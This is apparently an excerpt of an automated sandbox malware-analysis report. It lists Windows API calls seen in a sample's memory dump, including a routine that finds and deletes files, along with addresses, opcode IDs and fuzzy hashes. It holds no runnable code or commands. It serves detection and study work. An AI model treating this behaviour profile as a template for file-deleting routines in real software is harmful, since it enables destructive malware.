                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FolderPath_memmove
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3334745507-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,003A06E6,00000000,00000000,00000000), ref: 003642BF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,003B3BFE), ref: 003B4FED
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 003B4005: FindFirstFileW.KERNEL32(?,?), ref: 003B407C
                                                                                                                                                                                                                      • Part of subcall function 003B4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 003B40CC
                                                                                                                                                                                                                      • Part of subcall function 003B4005: FindNextFileW.KERNEL32(00000000,00000010), ref: 003B40DD
                                                                                                                                                                                                                      • Part of subcall function 003B4005: FindClose.KERNEL32(00000000), ref: 003B40F4
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003BC292
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2191629493-0
                                                                                                                                                                                                                    • Opcode ID: c969b963ac7d0d46446110d77e2c95f7620fcbd383a962b92ec56e54dcb45a5d
                                                                                                                                                                                                                    • Instruction ID: 7910b8a3ee394038aaebca83f72a06f412c820e2dad10b79fa887de3607b72f6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c969b963ac7d0d46446110d77e2c95f7620fcbd383a962b92ec56e54dcb45a5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEF0A7352101104FCB16EF59D840F59B7E5AF44324F05C419F9058F352CB74BC41CB94
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,00392F8B), ref: 003642EF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                    • Opcode ID: 1fc87071bba6210051a706bf289d00511968b49f22faff1d5365e2f2bfced6e2
                                                                                                                                                                                                                    • Instruction ID: ea3fc365ab534974ca9f31636834bbd65948b1921fe40d154cbaf5c27337a491
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fc87071bba6210051a706bf289d00511968b49f22faff1d5365e2f2bfced6e2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0E09279800B01CFC7324F1AE814412FBE8FFE53613218E2EE0E692A64D3B0589A8B50